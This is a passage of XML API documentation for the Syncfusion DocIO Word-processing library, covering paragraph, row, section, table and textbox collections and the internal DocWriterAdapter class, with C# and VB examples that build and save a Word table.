            <param name="index">The <b>integer</b> that specifies the index.</param>
            <param name="paragraph">The paragraph to be inserted.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphCollection.IndexOf(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Returns the zero-based index of the specified paragraph.
            </summary>
            <param name="paragraph">The paragraph to which the index to be found.</param>
            <returns>The zero-based index of the paragraph.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphCollection.Remove(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Removes the specified paragraph from the collection.
            </summary>
            <param name="paragraph">The paragraph to be removed from the collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphCollection.RemoveAt(System.Int32)">
            <summary>
            Removes the paragraph at the specified index from the collection.
            </summary>
            <param name="index">The index of the paragraph to be removed.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.WParagraph"/> at the specified index.
            </summary>
            <param name="index">The zero-based index of the paragraph to get from the collection.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WParagraph"/> instance.</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.WParagraphCollection"/>.</exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraphCollection.OwnerTextBody">
            <summary>
            Gets the owner <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> of the collection.
            </summary>
            <value>The owner text body.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WRowCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/> objects. 
            </summary>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                section.AddParagraph().AppendText("Price Details");
                section.AddParagraph();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                //Get the rows collection from table
                WRowCollection rowCollection = table.Rows;            
                //Add the first row into table
                WTableRow row = new WTableRow(document);
                //Add the first cell into first row 
                WTableCell cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Item");
                //Add the second cell into first row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Price($)");
                //Add row to the collection
                rowCollection.Add(row);
                //Add the second row into table
                row = new WTableRow(document);
                //Add the first cell into second row
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Apple");
                //Add the second cell into second row
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("50");
                //Insert row at index 1
                rowCollection.Insert(1, row);
                //Add the third row into table
                row = new WTableRow(document);
                //Add the first cell into third row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Orange");
                //Add the second cell into third row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("30");
                //Insert row
                rowCollection.Insert(2, row);
                //Remove row at index 0.
                rowCollection.RemoveAt(0);
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Price Details")
                section.AddParagraph()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                'Get the rows collection from table
                Dim rowCollection As WRowCollection = table.Rows
                'Add the first row into table
                Dim row As New WTableRow(document)
                'Add the first cell into first row 
                Dim cell As WTableCell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Item")
                'Add the second cell into first row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Price($)")
                'Add row to the collection
                rowCollection.Add(row)
                'Add the second row into table
                row = New WTableRow(document)
                'Add the first cell into second row
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Apple")
                'Add the second cell into second row
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("50")
                'Insert row at index 1
                rowCollection.Insert(1, row)
                'Add the third row into table
                row = New WTableRow(document)
                'Add the first cell into third row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Orange")
                'Add the second cell into third row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("30")
                'Insert row
                rowCollection.Insert(2, row)
                'Remove row at index 0.
                rowCollection.RemoveAt(0)
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WRowCollection.#ctor(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WRowCollection"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.WTable"/> instance.
            </summary>
            <param name="owner">The <see cref="T:Syncfusion.DocIO.DLS.WTable"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WRowCollection.Add(Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Adds the specified table row to the collection.
            </summary>
            <param name="row">The row.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WRowCollection.Insert(System.Int32,Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Inserts the specified table row at the specified index in the collection.
            </summary>
            <param name="index">The index.</param>
            <param name="row">The row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WRowCollection.IndexOf(Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Returns the index of the specified row in the collection.
            </summary>
            <param name="row">The row.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WRowCollection.Remove(Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Removes the specified row from the collection.
            </summary>
            <param name="row">The row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WRowCollection.GetTagItemName">
            <summary>
            Gets the name of xml tag.
            <exclude/>
            </summary>
            <value>The <b>string</b> that specifies the tag name.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WRowCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Creates new item.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> instance.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/> instance.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WRowCollection.Item(System.Int32)">
            <summary>
            Gets the table row at the specified index.
            </summary>
            <param name="index">The zero-based index of the row to get from the collection.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/> at the specified index.</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.WRowCollection"/>.</exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WRowCollection.TypesOfElement">
            <summary>
            Gets the type of the elements present in the collection.
            <exclude/>
            </summary>
            <value>The <see cref="T:System.Type"/> collection that contains the types of the elements.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WSectionCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.WSection"/>. 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWSectionCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.IWSection"/>.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWSectionCollection.Add(Syncfusion.DocIO.DLS.IWSection)">
            <summary>
            Adds a new <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> to end of document.
            </summary>
            <param name="section">The <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> to be added to the collection.</param>
            <returns>The zero-based index of the <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWSectionCollection.IndexOf(Syncfusion.DocIO.DLS.IWSection)">
            <summary>
            Returns the zero-based index of the specified section.
            </summary>
            <param name="section">The <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> object.</param>
            <returns>The zero-based index of the first occurrence of item</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWSectionCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> at the specified index.
            </summary>
            <param name="index">The zero-based index of the section to get</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> at the specified index</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid index in the <see cref="T:Syncfusion.DocIO.DLS.IWSectionCollection"/></exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSectionCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WSectionCollection"/> class.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSectionCollection.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WSectionCollection"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSectionCollection.Add(Syncfusion.DocIO.DLS.IWSection)">
            <summary>
            Adds a new <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> to end of document.
            </summary>
            <param name="section">The <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> to be added to the collection.</param>
            <returns>The zero-based index of the <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSectionCollection.IndexOf(Syncfusion.DocIO.DLS.IWSection)">
            <summary>
            Returns the zero-based index of the specified section.
            </summary>
            <param name="section">The <see cref="T:Syncfusion.DocIO.DLS.IWSection"/> object.</param>
            <returns>The zero-based index of the first occurrence of item</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSectionCollection.GetText">
            <summary>
            Gets the text.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSectionCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Creates the item.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WSection"/> object which can be casted as <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WSectionCollection.GetTagItemName">
            <summary>
            Gets name of xml tag
            <exclude/>
            </summary>
            <returns>The <b>string</b> that represents the section tag name.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSectionCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.WSection"/> at the specified index.
            </summary>
            <param name="index">The zero-based index of the section to get</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WSection"/> at the specified index</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid index in the <see cref="T:Syncfusion.DocIO.DLS.WSectionCollection"/></exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WSectionCollection.TypesOfElement">
            <summary>
            Gets the type of the elements present in the collection.
            <exclude/>
            </summary>
            <value>The <see cref="T:System.Type"/> collection that contains the types of the elements.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WTableCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> objects.
            </summary>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the tables collection
                WTableCollection tablecollection = document.Sections[0].Tables as WTableCollection;
                //Create new table
                WTable table = new WTable(document);
                table.ResetCells(2,2);
                //Add table to the collection
                tablecollection.Add(table);
                //Get the index of the added table
                int index = tablecollection.IndexOf(table);
                //Insert another table at next index
                table = new WTable(document);
                table.ResetCells(3, 3);
                tablecollection.Insert(index + 1, table);
                //Remove the table at index 0
                tablecollection.RemoveAt(0);
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the tables collection
                Dim tablecollection As WTableCollection = TryCast(document.Sections(0).Tables, WTableCollection)
                'Create new table
                Dim table As New WTable(document)
                table.ResetCells(2, 2)
                'Add table to the collection
                tablecollection.Add(table)
                'Get the index of the added table
                Dim index As Integer = tablecollection.IndexOf(table)
                'Insert another table at next index
                table = New WTable(document)
                table.ResetCells(3, 3)
                tablecollection.Insert(index + 1, table)
                'Remove the table at index 0
                tablecollection.RemoveAt(0)
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWTableCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.IWTable"/>.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTableCollection.Add(Syncfusion.DocIO.DLS.IWTable)">
            <summary>
            Adds a table to end of text body.
            </summary>
            <param name="table">The <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> object to be added.</param>
            <returns>The zero-based index of the table.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTableCollection.IndexOf(Syncfusion.DocIO.DLS.IWTable)">
            <summary>
            Returns the index of a table in the collection.
            </summary>
            <param name="table">The <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> to which the index to be find.</param>
            <returns>The zero-based index of the table.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTableCollection.Contains(Syncfusion.DocIO.DLS.IWTable)">
            <summary>
            Determines whether the <see cref="T:Syncfusion.DocIO.DLS.IWTableCollection"/> contains a specific table.
            </summary>
            <param name="table">The <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> object to be found.</param>
            <returns><b>True</b> if table is found, otherwise <c>false</c>.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTableCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> at the specified index.
            </summary>
            <value></value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCollection.#ctor(Syncfusion.DocIO.DLS.BodyItemCollection)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTableCollection"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.BodyItemCollection"/> instance.
            </summary>
            <param name="bodyItems">The collection of body items.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCollection.Add(Syncfusion.DocIO.DLS.IWTable)">
            <summary>
            Adds the specified table to the end of text body.
            </summary>
            <param name="table">The <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> to be added.</param>
            <returns>The zero-based index of the table.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCollection.Contains(Syncfusion.DocIO.DLS.IWTable)">
            <summary>
            Determines whether the <see cref="T:Syncfusion.DocIO.DLS.IWTableCollection"/> contains the specified table.
            </summary>
            <param name="table">The <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> object to be found.</param>
            <returns><b>True</b> if table is found, otherwise <c>false</c>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCollection.IndexOf(Syncfusion.DocIO.DLS.IWTable)">
            <summary>
            Returns the index of the specified table in the collection.
            </summary>
            <param name="table">The <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> to which the index to be found.</param>
            <returns>The zero-based index of the table.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCollection.Insert(System.Int32,Syncfusion.DocIO.DLS.IWTable)">
            <summary>
            Inserts the specified table into collection at the specified index.
            </summary>
            <param name="index">The zero-based index for the table to insert.</param>
            <param name="table">The <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> to be inserted.</param>
            <returns>The zero-based index of the item inserted.</returns>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid within the <see cref="T:Syncfusion.DocIO.DLS.IWTableCollection"/>.</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCollection.Remove(Syncfusion.DocIO.DLS.IWTable)">
            <summary>
            Removes the specified table from the collection.
            </summary>
            <param name="table">The <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> to be removed from the collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCollection.RemoveAt(System.Int32)">
            <summary>
            Removes the table at the specified index from the collection.
            </summary>
            <param name="index">The zero-based index of the table to be removed.</param>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid within the <see cref="T:Syncfusion.DocIO.DLS.IWTableCollection"/></exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> at the specified index.
            </summary>
            <param name="index">The zero-based index to get the table.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IWTable"/> at the specified index.</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.WTableCollection"/>.</exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTableCollection.OwnerTextBody">
            <summary>
            Gets the owner <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> of the collection.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WTextBoxCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.WTextBox"/> objects.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWTextBoxCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.IWTextBox"/>.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTextBoxCollection.Add(Syncfusion.DocIO.DLS.IWTextBox)">
            <summary>
            Adds a textbox to the collection.
            </summary>
            <param name="textBox">The text box.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTextBoxCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.IWTextBox"/> at the specified index.
            </summary>
            <value></value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxCollection.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTextBoxCollection"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxCollection.Add(Syncfusion.DocIO.DLS.IWTextBox)">
            <summary>
            Adds the specified textbox to the collection.
            </summary>
            <param name="textBox">The text box to be added.</param>
            <returns>The zero-based index of the text box.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Creates a new item.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxCollection.GetTagItemName">
            <summary>
            Gets the name of xml tag.
            <exclude/>
            </summary>
            <returns>The <b>string</b> that specifies the tag name.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.IWTextBox"/> at the specified index. Read-only.
            </summary>
            <param name="index">The zero-based index of the text box to get from the collection.</param>
            <value>The text box at the specified index.</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.WTextBoxCollection"/>.</exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxCollection.TypesOfElement">
            <summary>
            Gets the type of the elements present in the collection.
            <exclude/>
            </summary>
            <value>The <see cref="T:System.Type"/> collection that contains the types of the elements.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocWriterAdapter">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_listID">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_mainWriter">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_document">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_txbxItems">
            <summary>
            Collection of main textboxes
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_hfTxbxItems">
            <summary>
            Collection of header/footer textboxes
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_commentCollection">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_footnoteCollection">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_endnoteCollection">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_charStylesHash">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_listData">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_bookmarksAfterCell">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_fieldStack">
            <summary>
            Field stack.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_commOffsets">
            <summary>
            Stores bookmark offsets for each comment 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocWriterAdapter.m_listPicture">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.Write(Syncfusion.DocIO.ReaderWriter.WordWriter,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            By means of WordWriter writes WordDocument to doc
            </summary>
            <param name="writer">The writer.</param>
            <param name="document">The document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.Init(Syncfusion.DocIO.ReaderWriter.WordWriter)">
            <summary>
            Must be called before doc building
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteBody">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteMainBody">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteHFBody">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteSeparatorStories">
            <summary>
            Writes the Footnote/Endnote separator stories.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteSeparatorStory(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Writes the separator story body items
            </summary>
            <param name="section">The section.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.InsertWatermark(Syncfusion.DocIO.DLS.WTextBody,Syncfusion.DocIO.ReaderWriter.HeaderType)">
            <summary>
            Inserts the watermark.
            </summary>
            <param name="paragraphs">The paragraphs.</param>
            <param name="headerType">Type of the header.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.GetFirstPara(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Returns First Paragraph in the given text body
            </summary>
            <param name="textBody"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.GetFirstTblPara(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Gets the first TBL paragraph.
            </summary>
            <param name="table">The table.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteTextBoxBody(Syncfusion.DocIO.DLS.WTextBoxCollection,Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
             Write textbox body to document
            </summary>
            <param name="txbxCollection">Collection of document's textboxes</param>
            <param name="txBxType">Textbox type ( main or header/footer)</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteTextBoxText(Syncfusion.DocIO.ReaderWriter.IWordSubdocumentWriter,Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            
            </summary>
            <param name="txbxWriter"></param>
            <param name="textBox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteFootnotesBody">
            <summary>
            Writes the footnotes body.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteAnnotationsBody">
            <summary>
            Writes the annotations body.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteEndnotesBody">
            <summary>
            Writes the endnotes body.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteTextBoxes">
            <summary>
            Write textbody for header/footer and main textboxes
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteHeaderFooter(Syncfusion.DocIO.ReaderWriter.WordHeaderFooterWriter,Syncfusion.DocIO.DLS.BodyItemCollection,Syncfusion.DocIO.ReaderWriter.HeaderType)">
            <summary>
            Writes header/footer to wordwriter
            </summary>
            <param name="hfWriter"></param>
            <param name="collection"></param>
            <param name="hType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteSubDocumentText(Syncfusion.DocIO.ReaderWriter.IWordSubdocumentWriter,Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Writes the sub document text.
            </summary>
            <param name="writer">The writer.</param>
            <param name="body">The body.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteParagraphs(Syncfusion.DocIO.DLS.BodyItemCollection,System.Boolean)">
            <summary>
            
            </summary>
            <param name="paragraphs"></param>
            <param name="isTableBody"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteSDTBlock(Syncfusion.DocIO.DLS.StructureDocumentTagBlock,System.Boolean)">
            <summary>
            Writes the SDT block.
            </summary>
            <param name="sdtBlock">The SDT block.</param>
            <param name="isTableBody">if set to <c>true</c> [is table body].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.CheckCurItemInTable(System.Boolean,Syncfusion.DocIO.DLS.BodyItemCollection,System.Int32)">
            <summary>
            Checks the next item in table.
            </summary>
            <param name="isTableBody">if it is table body, set to <c>true</c>.</param>
            <param name="paragraphs">The paragraphs.</param>
            <param name="itemIndex">Index of the item.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteParagraph(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            
            </summary>
            <param name="paragraph"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteListPictures">
            <summary>
            Writes the list pictures.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="item">The item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteParaItem(Syncfusion.DocIO.DLS.ParagraphItem,Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Writes the paragraph item.
            </summary>
            <param name="item">The paragraph item.</param>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.CheckShapeField(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Checks the shape field
            </summary>
            <param name="item"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteDocumentEscher">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteAbsoluteTab(Syncfusion.DocIO.DLS.WAbsoluteTab)">
            <summary>
            Write Absolute tab
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteWatermarkParagraphs">
            <summary>
            Write empty paragraphs (needed for watermark).
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteText(Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Writes the text.
            </summary>
            <param name="text">The text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocWriterAdapter.WriteTextChunks(System.String,System.Boolean)">
            <summary>
            Writes the text chunks.
            </summary>
            <param name="text">The text.</param>
            <param name="safeText">if it is a safe text, set to <c>true</c>.</param>
        </member>
